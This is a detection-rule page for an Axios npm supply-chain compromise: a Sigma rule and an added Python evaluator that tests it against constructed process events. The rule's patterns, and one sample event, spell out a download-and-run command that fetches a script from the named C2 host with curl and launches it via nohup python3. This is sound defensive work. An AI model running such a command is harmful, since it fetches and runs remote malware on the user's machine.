Axios NPM Compromise Indicators - Linux
Detects the Linux-specific execution chain of the malicious plain-crypto-js npm dependency pulled in by the compromised Axios npm package, including payload download via curl and detached execution via nohup and python3. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
Sigma rule
```yaml
title: Axios NPM Compromise Indicators - Linux
id: 0a23a62d-c5b3-468b-a072-25064a9a8c87
status: experimental
description: |
    Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency by Axios NPM package, including payload download via curl and detached execution using nohup and python3.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.defense-evasion
    - attack.t1059.006
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_node_shell:
        ParentImage|endswith:
            - '/node'
            - '/bun'
        CommandLine|contains|all:
            - 'curl '
            - '/tmp/ld.py'
            - 'python3 '
            - 'nohup '
            - '6202033'
    selection_curl_download:
        Image|endswith: '/curl'
        CommandLine|contains: 'http://sfrclak.com'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
```
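To see exactly which process_creation events this rule fires on, here is an added Python evaluator of its detection block (an example written for this page, not part of the rule or of any Sigma tooling), run over constructed events that carry only the indicator strings the rule lists. It assumes the standard Sigma semantics of case-insensitive string matching, ANDed fields within a selection, and the `1 of selection_*` condition; wildcards and other modifiers are not implemented.

```python
"""Evaluate the detection block of the Sigma rule above against sample process_creation
events. Added example, not from the rule or from any Sigma tool."""
# Detection block transcribed from the rule: selection -> {field|modifiers: value(s)}.
DETECTION = {
    "selection_node_shell": {
        "ParentImage|endswith": ["/node", "/bun"],
        "CommandLine|contains|all": ["curl ", "/tmp/ld.py", "python3 ", "nohup ", "6202033"],
    },
    "selection_curl_download": {
        "Image|endswith": "/curl",
        "CommandLine|contains": "http://sfrclak.com",
    },
}

def _field_matches(event, spec, values):
    """Apply one Sigma field spec such as 'CommandLine|contains|all' to an event.
    Sigma string matching is case-insensitive by default, so both sides are lowercased."""
    field, *mods = spec.split("|")
    actual = str(event.get(field, "")).lower()
    values = [str(v).lower() for v in (values if isinstance(values, list) else [values])]
    if "endswith" in mods:
        hits = [actual.endswith(v) for v in values]
    elif "contains" in mods:
        hits = [v in actual for v in values]
    else:
        hits = [actual == v for v in values]
    return all(hits) if "all" in mods else any(hits)  # 'all' needs every value, else any one

def matching_selections(event):
    """Selections whose field specs all match (fields within a selection are ANDed)."""
    return [name for name, sel in DETECTION.items()
            if all(_field_matches(event, spec, vals) for spec, vals in sel.items())]

def rule_matches(event):
    """Condition '1 of selection_*': the rule fires when any selection_* matches."""
    return any(n.startswith("selection_") for n in matching_selections(event))

# Constructed events (not real telemetry). The first two carry only the indicator strings
# the rule lists; the last two are benign look-alikes that share some of the tokens.
EVENTS = [
    {"Image": "/usr/bin/sh", "ParentImage": "/usr/local/bin/node",
     "CommandLine": 'sh -c "curl http://sfrclak.com -o /tmp/ld.py && nohup python3 /tmp/ld.py 6202033 &"'},
    {"Image": "/usr/bin/curl", "ParentImage": "/usr/bin/sh",
     "CommandLine": "curl http://sfrclak.com -o /tmp/ld.py"},
    {"Image": "/usr/bin/sh", "ParentImage": "/usr/local/bin/node",
     "CommandLine": 'sh -c "nohup python3 /opt/app/worker.py &"'},
    {"Image": "/usr/bin/curl", "ParentImage": "/usr/bin/bash",
     "CommandLine": "curl -sSL https://registry.npmjs.org/axios -o /tmp/axios.json"},
]
```

The benign node child that runs `nohup python3` without the curl, `/tmp/ld.py` and `6202033` tokens does not fire, which is what the `contains|all` modifier buys over a plain `contains`.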
Related rules
- Axios NPM Compromise Indicators - macOS
- Axios NPM Compromise Indicators - Windows
- Axios NPM Compromise File Creation Indicators - Linux
- Axios NPM Compromise File Creation Indicators - MacOS
- Potential Exploitation of RCE Vulnerability CVE-2025-33053